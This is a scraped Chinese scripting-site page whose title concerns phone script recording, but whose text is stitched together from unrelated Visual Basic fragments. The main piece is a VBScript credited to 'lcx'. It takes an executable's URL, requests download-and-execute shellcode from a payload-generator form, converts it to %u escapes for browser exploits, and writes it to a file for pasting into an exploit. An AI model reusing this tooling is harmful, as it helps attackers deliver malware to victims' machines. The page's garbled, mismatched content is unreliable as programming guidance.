代码中,首先简单地检测文件,若存在则激发FileFound事件,然后将Timer1的时间间隔设为0,停止以后的检测ResultFile=pCmd." />

免root脚本精灵脚本录制好了怎么用执行时候不用sh

发布时间:2020-08-23 来源:脚本之家 点击:



  在Timer1代码中添加下列语句:

->  PrivateSubTimer1_Timer()

   IfDir(Filename)<>""Then

    RaiseEventFileFound

    Timer1.Interval=0

   EndIf

  EndSub->

  代码中,首先简单地检测文件,若存在则激发FileFound事件,然后将Timer1的时间间隔设为0,停止以后的检测
ResultFile=pCmd.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\SysCmd") & "\ListSysCmd.txt"
ListSysCmd ResultFile
pCmd.Run("Notepad.exe " & ResultFile)
WScript.Quit()
Else '只有一个参数时, 默认处理方式是建立传入的文件路径的快捷方式
dnf脚本搬砖
set fn=fso.GetFile("E:\AD.txt")
使用ProcessingTimeort事件可以监视这些操作的状态,并取消任何花费时间过长的操作

好了,假设新进程(例如屏幕保护程序)启动每个对象对每个可以识别的事件都有一个“事件过程”,当事件过程不同时,对事件所表现出来的反应自然也会不同


->PublicSubFillList(ListControlAsListBox,ParamArrayItems())
DimiAsVariant
WithListControl
.Clear
ForEachiInItems
.AddItemi
Next
EndWith
EndSub

PrivateSubCommand1_Click()
FillListList1,"TiffanyT","MikeS","RochesterNY"
EndSub->
->

以上sql语句看上去没有任何的语法错误,往往令人不知所措产品宣传片VB的Right函数、Left函数提供了从左或从右在已知字符串中截取指定数量的未知字符串的功能,不过要获取某个特定字符前面或者后面的字符串,情形就不一样了,比如我们要在字符串"E:\MyFavourite\001\xxx.xxx"中截取最后一个""后面的字符串亦即文件名,单单用上述几个函数是难以实现的,因为文件名的字节数难以确定'code by lcx

On Error Resume Next
Exeurl=InputBox( "请输入exe的地址:", "输入", "" )
url=""&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"


Body=getHTTPPage(url)
Set Re=New RegExp
Re.Pattern="(\$shellcode \=[\s\S]+</div></pre>)"

Set Matches=Re.Execute(Body)
If Matches.Count>0 Then Body=Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode=",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function


Function getHTTPPage(Path)
t=GetBody(Path)
getHTTPPage=BytesToBstr(t, "GB2312")
End Function

Function GetBody(url)
On Error Resume Next
Set Retrieval=CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody=.ResponseBody
End With
Set Retrieval=Nothing
End Function

Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream=CreateObject("adodb.stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Write Body
objstream.Position=0
objstream.Type=2
objstream.Charset=Cset
BytesToBstr=objstream.ReadText
objstream.Close
Set objstream=Nothing
End Function

Function URLEncoding(vstrIn)
strReturn=""
For aaaa=1 To Len(vstrIn)
ThisChr=Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn=strReturn & ThisChr
Else
innerCode=Asc(ThisChr)
If innerCode < 0 Then
innerCode=innerCode + &H10000
End If
Hight8=(innerCode And &HFF00)\ &HFF
Low8=innerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding=strReturn
End Function

set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing

wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换里的shellcode1内容即可"。

网站地图 | Tag标签 | RSS订阅
Copyright © 2012-2019 脚本之家 All Rights Reserved
脚本之家  渝ICP备13030612号